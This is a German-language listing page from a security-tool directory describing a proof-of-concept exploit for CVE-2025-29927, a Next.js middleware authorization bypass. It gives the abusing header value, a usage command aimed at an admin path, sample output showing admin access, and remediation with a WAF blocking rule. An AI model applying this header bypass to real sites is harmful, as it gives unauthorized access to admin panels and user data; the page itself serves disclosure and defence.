Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29927-PoC — Hier ist ein einfacher, aber effektiver Exploit für CVE-2025-29927. | Kitploit
Tools/GitHubGitHub/w2hcorp/cve-2025-29927-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRed Teaming
GitHubw2hcorp/cve-2025-29927-poc

CVE-2025-29927-PoC

Hier ist ein einfacher, aber effektiver Exploit für CVE-2025-29927.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-29927 - Next.js Middleware-Autorisierungsbypass (PoC)

Dieses Repository enthält einen Proof-of-Concept (PoC) Exploit für CVE-2025-29927, eine kritische Schwachstelle in Next.js, die es Angreifern ermöglicht, Autorisierungsprüfungen zu umgehen, indem sie einen middleware-spezifischen HTTP-Header missbrauchen.


Übersicht

  • CVE-ID: CVE-2025-29927
  • Schweregrad: Kritisch (CVSS 9.1)
  • Betroffenes Framework: Next.js
  • Schwachstellentyp: Autorisierungsbypass
  • Ausnutzungsvektor: HTTP-Request-Header
  • Komplexität des Exploits: Niedrig
  • Authentifizierung erforderlich: Nein

Über die Schwachstelle

Next.js-Anwendungen verlassen sich oft auf Middleware für Autorisierung und Zugriffskontrolle. Diese CVE entsteht durch einen Logikfehler bei der Verarbeitung des x-middleware-subrequest-Headers. Wenn dieser Header auf middleware gesetzt ist, kann der Server fälschlicherweise annehmen, dass die Anfrage aus interner Logik stammt, und middlewarebasierte Authentifizierung umgehen.

Dies kann es Angreifern ermöglichen, auf Admin-Panels, geschützte APIs oder Benutzerdaten zuzugreifen – ohne Anmeldeinformationen oder gültige Sitzung.


PoC-Exploit

Wir stellen ein einfaches Python-Skript zur Verfügung, um zu testen, ob eine Next.js-Anwendung verwundbar ist.

▶️ Verwendung

root@kitploit:~
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]

Beispielausgabe

root@kitploit:~
[+] Sende Anfrage an: https://target.com/admin
[+] Verwende Header: x-middleware-subrequest: middleware
[+] Statuscode: 200
[+] Antworttext (erste 500 Zeichen):
<!DOCTYPE html><html><head>...Sie sind als Admin angemeldet...

Abhängigkeiten

  • Python 3.6+
  • requests-Bibliothek

Abhilfe

  • Aktualisieren Sie auf die neueste gepatchte Version von Next.js.
  • Verwenden Sie x-middleware-subrequest nicht als Vertrauenssignal.
  • Implementieren Sie serverseitige Sitzungsvalidierung und ordnungsgemäße Autorisierungsprüfungen in geschützten Routen.
  • Erwägen Sie das Hinzufügen von WAF/IDS-Regeln, um verdächtige Verwendung dieses Headers zu blockieren oder zu kennzeichnen.

WAF-Logik:

root@kitploit:~
if header 'x-middleware-subrequest' == 'middleware':
    block_request()

Offenlegung & Danksagungen

Dieser PoC wurde vom Offensive Security Team der W2H Corp. im Rahmen unserer kontinuierlichen Sicherheitsforschung entwickelt. Der ursprüngliche Beitrag zur Erklärung der CVE befindet sich hier.

Tool herunterladen